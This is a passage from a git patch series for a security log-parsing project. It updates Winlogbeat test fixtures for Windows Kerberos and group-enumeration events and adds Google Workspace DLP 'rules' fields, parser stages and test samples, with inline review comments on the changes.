de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json index b69049f3d..3e7783fbd 100644 --- a/Beats/winlogbeat/tests/security_event_4798.json +++ b/Beats/winlogbeat/tests/security_event_4798.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program 
Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was 
enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 
(WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account 
Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", From 97df98680856146f65f7555985ef2764e75c5312 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 14 Nov 2024 14:24:35 +0100 Subject: [PATCH 229/317] Add rules service --- Google Cloud/google-report/_meta/fields.yml | 25 +++++++++ .../_meta/smart-descriptions.json | 50 +++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 23 ++++++++ .../tests/test_rules_sample_1.json | 55 +++++++++++++++++++ .../tests/test_rules_sample_2.json | 55 +++++++++++++++++++ 5 files changed, 208 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_rules_sample_1.json create mode 100644 Google Cloud/google-report/tests/test_rules_sample_2.json 
diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..fd683eea8 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -33,6 +33,31 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword +google.report.rule.data_source: + description: Data source + name: google.report.rule.data_source + type: keyword + +google.report.rule.name: + description: Name of the rule + name: google.report.rule.name + type: keyword + +google.report.rule.scan_type: + description: Scan type + name: google.report.rule.scan_type + type: keyword + +google.report.rule.severity: + description: Severity of the rule + name: google.report.rule.severity + type: keyword + +google.report.rule.type: + description: Rule type + name: google.report.rule.type + type: keyword + google.report.token.app_name: description: Token authorization application name name: google.report.token.app_name diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..9b88f06de 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json 
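Review bot: The descriptions added for `google.report.rule.data_source`, `google.report.rule.scan_type` and `google.report.rule.type` only restate the field name, so the field catalogue tells an analyst nothing the key does not already say. A one-line description naming what the value denotes plus a sample value from the fixture would help, e.g. `description: Workspace data source the rule was evaluated against (e.g. DRIVE)` and `description: Kind of scan that produced the event (e.g. DRIVE_ONLINE_SCAN)`. The `google.report.access.application` entry ("Application name") added in the following patch has the same problem.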
@@ -168,6 +168,56 @@ } ] }, + { + "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "action_complete" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "The {google.report.rule.type} content was matched with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "content_matched" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..e9640ba28 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -28,6 +28,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_rules_fields + filter: '{{ json_event.message.id.applicationName == "rules"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' 
@@ -258,3 +260,24 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_rules_fields: + actions: + - set: + google.report.rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.data_source: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "data_source" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.scan_type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "scan_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.severity: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "severity" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["info"] + filter: '{{ json_event.message.events[0].name in ["action_complete", "label_applied", "rule_trigger", "rule_match", "content_matched"]}}' + + - set: + event.type: ["deletion"] + filter: '{{ json_event.message.events[0].name == "label_removed"}}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "label_field_value_changed"}}' diff --git a/Google Cloud/google-report/tests/test_rules_sample_1.json b/Google Cloud/google-report/tests/test_rules_sample_1.json new file mode 100644 index 000000000..3f7ef889b --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_1.json 
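Review bot: Each `google.report.rule.*` value in `set_rules_fields` is produced by looping over every parameter and emitting the matching value, so a repeated parameter name concatenates the values into one string and an absent parameter yields an empty string; whether the engine then drops the empty value is not visible in this hunk. A lookup that takes exactly one value avoids both cases, e.g. `google.report.rule.name: '{{ json_event.message.events[0].parameters | selectattr("name", "equalto", "rule_name") | map(attribute="value") | first }}'`, applied the same way to the other four keys (the `set_context_aware_fields` stage in the next patch uses the same loop pattern). The fixtures also carry `resource_id`, `resource_owner_email`, `resource_title` and `matched_trigger`, which this stage leaves unmapped; a short comment saying that is intentional would save the next reader a question.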
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro 
IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_rules_sample_2.json b/Google Cloud/google-report/tests/test_rules_sample_2.json new file mode 100644 index 000000000..f7a1e9bf9 --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_2.json 
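Review bot: The new fixture ends with `\ No newline at end of file`, and the same applies to `test_rules_sample_2.json` and `test_access_sample_1.json` in the following hunks. Adding the trailing newline keeps these files consistent with the other fixtures and avoids spurious diff noise on the next edit.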
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": 
